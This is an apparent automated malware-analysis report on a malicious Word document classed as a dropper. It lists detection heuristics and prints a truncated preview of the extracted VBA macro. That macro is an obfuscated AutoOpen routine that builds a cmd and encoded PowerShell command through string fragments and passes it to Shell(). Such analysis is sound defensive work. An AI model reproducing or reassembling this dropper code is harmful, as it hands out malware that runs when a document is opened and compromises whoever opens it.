MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The specific command constructed appears to be obfuscated but likely involves downloading and executing a secondary payload. The ClamAV detection 'Doc.Dropper.Valyria-6668100-0' further supports its role as a dropper.
Heuristics 6
-
ClamAV: Doc.Dropper.Valyria-6668100-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6668100-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14202 bytes |
SHA-256: 9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DlLVColizzEq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next Hour Sqr(hMJhB) Hour 40 Error Atn(1) Error CCur(VIPhP) Hour 1 Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644 Hour CDate(BXjnr) Error 8 End Sub Attribute VB_Name = "iHJjMWjDQSX" Function UBitRZz() On Error Resume Next Error Str(60383 * 74581 + aFqLTl / 26537) Error 1085 sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + " " + " " + " " Hour CStr(ozlBQr) Error TimeValue(1) jKlpHQ = " " + " " + " " + " " + " " + " " + " " + " " + "/c" Hour 9 Hour 508 bJFviRjvGM = " " + " " + " " + " " + " " + " " + " " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " " Hour CDbl(Chjzmf / qmsts) Error Int(587) iiziz = "s" + "E" + "t " + " } " + " " Hour Hex(PTEsFO - bwfAu) Error Round(7) odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA" Error Cos(100) Error 48 SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0" Error FJCrf Error CDec(33) Hour TimeValue(EOCcRo + FsIki) jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A" Hour RMBjpu Error LCase(10409 - HfWZU / aYZAGv + 2002) Error 770 tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M" UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs Hour LEQca Hour CVar(62) End Function Function KiiqiSjUM() On Error Resume Next Error vOjbSk Error 8 Error 431 iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0" Error LNNMW Error TEsaRO Hour CByte(96) wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF" Error 6 Hour 99 Hour Sqr(632) QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$" Hour CDate(93077 * nXfiCf) Hour Tan(3891) WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA" Hour tjcBh Error Int(jfjHMq) Hour 319432244 THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A" Error Int(5) Error 379512492 mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ" Error Sqr(BhXQU + mLvAFH) Hour Sgn(859) Hour Val(jnBLSk) kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A" Error 256125246 Error Fix(24427 * mqvvK) iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E" Error ZBzjXu Error YhzMq ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn" Error Rnd(WqpEZ) Error Int(2211) KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A" Hour Cos(mpsFkj + LwTcI) Hour Str(7557 + dzqBod / rEvjaK / XLlpd) rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B" Error CDec(570) Error Int(428575136) Error Log(IGbDzL) dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA" Error mrKww Error XStoZ SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg" KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv Hour 42 Hour Sin(57135 * FcGSwE + 52046 / lhXUom) End Function Function PRPpATiF() On Error Resume Next Hour Sqr(16449 - 1338) Error CDate(4895) zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab" Hour LCase(1) Hour Log(6) Error 198 GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.